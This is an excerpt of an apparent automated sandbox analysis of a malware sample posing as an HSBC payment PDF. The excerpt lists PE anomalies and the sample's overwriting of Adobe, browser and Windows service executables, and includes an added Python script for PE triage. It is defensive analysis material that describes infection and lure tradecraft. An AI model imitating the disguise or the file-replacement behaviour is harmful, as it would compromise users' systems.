              Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr
Source: alg.exe.0.dr - Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
Source: AppVClient.exe.0.dr - Static PE information: real checksum: 0xcd10f should be: 0x14ff8b
Source: armsvc.exe.0.dr - Static PE information: section name: .didat
Source: alg.exe.0.dr - Static PE information: section name: .didat
Source: chrome_proxy.exe.4.dr - Static PE information: section name: .00cfg
Source: chrome_proxy.exe.4.dr - Static PE information: section name: .gxfg
Source: chrome_proxy.exe.4.dr - Static PE information: section name: .retplne
Source: chrome_proxy.exe.4.dr - Static PE information: section name: _RDATA
Source: chrome_proxy.exe.4.dr - Static PE information: section name: malloc_h
Source: crashreporter.exe.4.dr - Static PE information: section name: .00cfg
Source: crashreporter.exe.4.dr - Static PE information: section name: .voltbl
Source: GoogleCrashHandler64.exe.4.dr - Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.4.dr - Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.4.dr - Static PE information: section name: .gehcont
Source: default-browser-agent.exe.4.dr - Static PE information: section name: .00cfg
Source: default-browser-agent.exe.4.dr - Static PE information: section name: .voltbl
Source: GoogleUpdateComRegisterShell64.exe.4.dr - Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.4.dr - Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.4.dr - Static PE information: section name: .gehcont
Source: firefox.exe.4.dr - Static PE information: section name: .00cfg
Source: firefox.exe.4.dr - Static PE information: section name: .freestd
Source: firefox.exe.4.dr - Static PE information: section name: .retplne
Source: firefox.exe.4.dr - Static PE information: section name: .voltbl
Source: maintenanceservice.exe.4.dr - Static PE information: section name: .00cfg
Source: maintenanceservice.exe.4.dr - Static PE information: section name: .voltbl
Source: maintenanceservice.exe.4.dr - Static PE information: section name: _RDATA
Source: minidump-analyzer.exe.4.dr - Static PE information: section name: .00cfg
Source: minidump-analyzer.exe.4.dr - Static PE information: section name: .voltbl
Source: pingsender.exe.4.dr - Static PE information: section name: .00cfg
Source: pingsender.exe.4.dr - Static PE information: section name: .voltbl
Source: plugin-container.exe.4.dr - Static PE information: section name: .00cfg
Source: plugin-container.exe.4.dr - Static PE information: section name: .voltbl
Source: private_browsing.exe.4.dr - Static PE information: section name: .00cfg
Source: private_browsing.exe.4.dr - Static PE information: section name: .voltbl
Source: updater.exe.4.dr - Static PE information: section name: .00cfg
Source: updater.exe.4.dr - Static PE information: section name: .voltbl
Source: updater.exe.4.dr - Static PE information: section name: _RDATA
Source: FXSSVC.exe.4.dr - Static PE information: section name: .didat
Source: elevation_service.exe.4.dr - Static PE information: section name: .00cfg
Source: elevation_service.exe.4.dr - Static PE information: section name: .gxfg
Source: elevation_service.exe.4.dr - Static PE information: section name: .retplne
Source: elevation_service.exe.4.dr - Static PE information: section name: _RDATA
Source: elevation_service.exe.4.dr - Static PE information: section name: malloc_h
Source: elevation_service.exe0.4.dr - Static PE information: section name: .00cfg
Source: elevation_service.exe0.4.dr - Static PE information: section name: .gxfg
Source: elevation_service.exe0.4.dr - Static PE information: section name: .retplne
Source: elevation_service.exe0.4.dr - Static PE information: section name: _RDATA
Source: elevation_service.exe0.4.dr - Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.4.dr - Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.4.dr - Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.4.dr - Static PE information: section name: _RDATA
Source: msdtc.exe.4.dr - Static PE information: section name: .didat
Source: msiexec.exe.4.dr - Static PE information: section name: .didat
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.dr - Static PE information: section name: .00cfg
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.dr - Static PE information: section name: .retplne
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.dr - Static PE information: section name: .00cfg
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.dr - Static PE information: section name: .retplne
Source: MsSense.exe.4.dr - Static PE information: section name: .didat
Source: Spectrum.exe.4.dr - Static PE information: section name: .didat
Source: TieringEngineService.exe.4.dr - Static PE information: section name: .didat
Source: vds.exe.4.dr - Static PE information: section name: .didat
Source: VSSVC.exe.4.dr - Static PE information: section name: .didat
Source: WmiApSrv.exe.4.dr - Static PE information: section name: .didat
Source: wmpnetwk.exe.4.dr - Static PE information: section name: .didat
Source: SearchIndexer.exe.4.dr - Static PE information: section name: .didat
Source: unpack200.exe.4.dr - Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.4.dr - Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.4.dr - Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.4.dr - Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.4.dr - Static PE information: section name: _RDATA
Source: cookie_exporter.exe.4.dr - Static PE information: section name: .00cfg
Source: cookie_exporter.exe.4.dr - Static PE information: section name: .gxfg
Source: cookie_exporter.exe.4.dr - Static PE information: section name: .retplne
Source: cookie_exporter.exe.4.dr - Static PE information: section name: _RDATA
Source: identity_helper.exe.4.dr - Static PE information: section name: .00cfg
Source: identity_helper.exe.4.dr - Static PE information: section name: .gxfg
Source: identity_helper.exe.4.dr - Static PE information: section name: .retplne
Source: identity_helper.exe.4.dr - Static PE information: section name: _RDATA
Source: identity_helper.exe.4.dr - Static PE information: section name: malloc_h
Source: setup.exe.4.dr - Static PE information: section name: .00cfg
Source: setup.exe.4.dr - Static PE information: section name: .gxfg
Source: setup.exe.4.dr - Static PE information: section name: .retplne
Source: setup.exe.4.dr - Static PE information: section name: LZMADEC
Source: setup.exe.4.dr - Static PE information: section name: _RDATA
Source: setup.exe.4.dr - Static PE information: section name: malloc_h
Source: msedgewebview2.exe.4.dr - Static PE information: section name: .00cfg
Source: msedgewebview2.exe.4.dr - Static PE information: section name: .gxfg
Source: msedgewebview2.exe.4.dr - Static PE information: section name: .retplne
Source: msedgewebview2.exe.4.dr - Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.4.dr - Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.4.dr - Static PE information: section name: _RDATA
Source: msedgewebview2.exe.4.dr - Static PE information: section name: malloc_h
Source: msedge_proxy.exe.4.dr - Static PE information: section name: .00cfg
Source: msedge_proxy.exe.4.dr - Static PE information: section name: .gxfg
Source: msedge_proxy.exe.4.dr - Static PE information: section name: .retplne
Source: msedge_proxy.exe.4.dr - Static PE information: section name: _RDATA
Source: msedge_proxy.exe.4.dr - Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.4.dr - Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.4.dr - Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.4.dr - Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.4.dr - Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.4.dr - Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.4.dr - Static PE information: section name: malloc_h
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_00428945 push ecx; ret 0_2_00428958
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_00402F12 push es; retf 0_2_00402F13
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15C38h; ret 0_2_02F15C35
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15C98h; ret 0_2_02F15C79
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15D22h; ret 0_2_02F15CB0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15F3Eh; ret 0_2_02F15D79
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15E05h; ret 0_2_02F15DD4
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15FAEh; ret 0_2_02F15F1A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15EE7h; ret 0_2_02F15F39
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F15E3Ch; ret 0_2_02F15F48
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16056h; ret 0_2_02F16014
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F162B2h; ret 0_2_02F1604C
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F161B2h; ret 0_2_02F16055
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F161E9h; ret 0_2_02F16092
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F1616Dh; ret 0_2_02F160B0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F160FAh; ret 0_2_02F160BF
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16189h; ret 0_2_02F160D2
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F1621Ch; ret 0_2_02F161D1
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16248h; ret 0_2_02F161E8
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F1606Fh; ret 0_2_02F162AF
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16374h; ret 0_2_02F16367
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F163BDh; ret 0_2_02F16373
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16441h; ret 0_2_02F163FA
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F163FFh; ret 0_2_02F1642E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16563h; ret 0_2_02F16485
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F1651Ch; ret 0_2_02F1659E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F165CAh; ret 0_2_02F16695
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16947h; ret 0_2_02F166A1
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16A3Bh; ret 0_2_02F166B3
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F16869h; ret 0_2_02F1673A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Code function: 0_2_02F162E0 push 02F165D8h; ret 0_2_02F1684D
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe - Static PE information: section name: .reloc entropy: 7.920472610831056
Source: AppVClient.exe.0.dr - Static PE information: section name: .reloc entropy: 7.92358913029766
Source: chrome_proxy.exe.4.dr - Static PE information: section name: .reloc entropy: 7.92726442586127
Source: default-browser-agent.exe.4.dr - Static PE information: section name: .reloc entropy: 7.929311025309845
Source: firefox.exe.4.dr - Static PE information: section name: .reloc entropy: 7.926471628018936
Source: minidump-analyzer.exe.4.dr - Static PE information: section name: .reloc entropy: 7.922344179985933
Source: FXSSVC.exe.4.dr - Static PE information: section name: .reloc entropy: 7.93006237528671
Source: elevation_service.exe.4.dr - Static PE information: section name: .reloc entropy: 7.931714198787888
Source: elevation_service.exe0.4.dr - Static PE information: section name: .reloc entropy: 7.933946495231756
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.dr - Static PE information: section name: .reloc entropy: 7.922117608319024
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.dr - Static PE information: section name: .reloc entropy: 7.922118553104344
Source: SensorDataService.exe.4.dr - Static PE information: section name: .reloc entropy: 7.9225210235147
Source: Spectrum.exe.4.dr - Static PE information: section name: .reloc entropy: 7.933283721436733
Source: AgentService.exe.4.dr - Static PE information: section name: .reloc entropy: 7.924362285797312
Source: vds.exe.4.dr - Static PE information: section name: .reloc entropy: 7.928794455099482
Source: VSSVC.exe.4.dr - Static PE information: section name: .reloc entropy: 7.927148447799061
Source: wbengine.exe.4.dr - Static PE information: section name: .reloc entropy: 7.929015421427103
Source: wmpnetwk.exe.4.dr - Static PE information: section name: .reloc entropy: 7.934808283704654
Source: SearchIndexer.exe.4.dr - Static PE information: section name: .reloc entropy: 7.933761232949268
Source: identity_helper.exe.4.dr - Static PE information: section name: .reloc entropy: 7.928228290645618
Source: setup.exe.4.dr - Static PE information: section name: .reloc entropy: 7.932267885972346
Source: msedgewebview2.exe.4.dr - Static PE information: section name: .reloc entropy: 7.923536914141419
Source: msedge_proxy.exe.4.dr - Static PE information: section name: .reloc entropy: 7.92985152599304
Source: msedge_pwa_launcher.exe.4.dr - Static PE information: section name: .reloc entropy: 7.9342430362750855
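The static PE findings in this section (a compile timestamp in the year 2101, a stored checksum that differs from the real one, section names outside the common set, .reloc sections sitting at 7.92 to 7.93 bits of entropy across two dozen unrelated binaries, and PDB paths pulled out of memory dumps) can all be reproduced with a short script. The block below is an added example written for this page; it is not Joe Sandbox code and not anything taken from the sample. It parses the PE headers with the Python standard library only, so it needs no pefile. The USUAL_SECTIONS list, the synthetic image that build_sample_pe() constructs and the path D:\T\Example\sample.pdb embedded in it are this example's own assumptions, and the default timestamp is the 0xF67E8745 value reported for alg.exe.0.dr above. Two caveats a practitioner should keep in mind: .didat (delay-load import data) and .00cfg (control-flow-guard data) are ordinary MSVC linker output, so a hit from the section-name check is a prompt to look rather than a verdict, and the interesting signal in this report is the near-identical .reloc entropy across Firefox, Chrome, Edge and Windows service binaries, which is exactly the cross-file pattern the entropy check is meant to surface.

```python
import math
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Names this example treats as ordinary (an assumption, not a Joe Sandbox list); others get flagged.
USUAL_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc",
                  ".idata", ".edata", ".tls", ".bss", ".CRT"}

def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant run, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_checksum(data, checksum_offset):
    """CheckSumMappedFile's algorithm: one's-complement sum of the image as 32-bit
    words, skipping the CheckSum field, folded to 16 bits, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)

def find_pdb_paths(data):
    """CodeView RSDS records (b'RSDS' + GUID + age + NUL-terminated path); works on
    a file or on a raw memory dump, which is where the report found its strings."""
    paths, pos = [], data.find(b"RSDS")
    while pos != -1:
        end = data.find(b"\0", pos + 24)
        if end != -1:
            paths.append(data[pos + 24:end].decode("latin-1"))
        pos = data.find(b"RSDS", pos + 4)
    return paths

def triage_pe(data, now=None):
    """Parse the DOS, COFF and section headers by hand and return the findings."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    nsec, ts = struct.unpack_from("<HI", data, pe + 6)
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    checksum_off = opt + 0x40                      # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)
    compiled = EPOCH + timedelta(seconds=ts)
    sections = []
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        name = name.rstrip(b"\0").decode("latin-1")
        sections.append({"name": name, "unusual": name not in USUAL_SECTIONS,
                         "entropy": round(shannon_entropy(data[raw_ptr:raw_ptr + raw_size]), 4)})
    return {"timestamp": ts, "compiled_utc": compiled.isoformat(),
            "timestamp_in_future": compiled > (now or datetime.now(timezone.utc)),
            "checksum_stored": stored, "checksum_computed": computed,
            "checksum_mismatch": stored != 0 and stored != computed,  # 0 means 'not set'
            "sections": sections, "pdb_paths": find_pdb_paths(data)}

def build_sample_pe(timestamp=0xF67E8745, tamper=False):
    """Constructed minimal PE32+ image (not any file from the report): a mostly-zero
    .didat carrying an RSDS record plus a uniformly distributed .reloc, checksum
    filled in. tamper=True flips one byte afterwards, leaving the stored/real
    checksum disagreement the report shows for AppVClient.exe.0.dr."""
    didat = (b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1)
             + b"D:\\T\\Example\\sample.pdb\0").ljust(512, b"\0")
    reloc = bytes(range(256)) * 4
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 2, timestamp, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)          # PE32+ magic; CheckSum at +0x40 is 0 for now
    def sec(name, off, blob):                      # IMAGE_SECTION_HEADER
        return struct.pack("<8sIIIIIIHHI", name, len(blob), off, len(blob), off, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + coff + opt + sec(b".didat", 512, didat) + sec(b".reloc", 1024, reloc)
    image = bytearray(headers.ljust(512, b"\0") + didat + reloc)
    csum_off = 64 + 24 + 0x40
    struct.pack_into("<I", image, csum_off, pe_checksum(bytes(image), csum_off))
    if tamper:
        image[1024] ^= 0x01
    return bytes(image)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in triage_pe(blob).items():
        print(f"{key}: {value}")
```

Run it as `python pe_triage.py <file>` against any of the dropped files (*.dr) listed in this section; with no argument it triages its own synthetic image. find_pdb_paths() can be pointed at a process memory dump directly, since it only scans for the RSDS signature and does not need valid headers.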

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
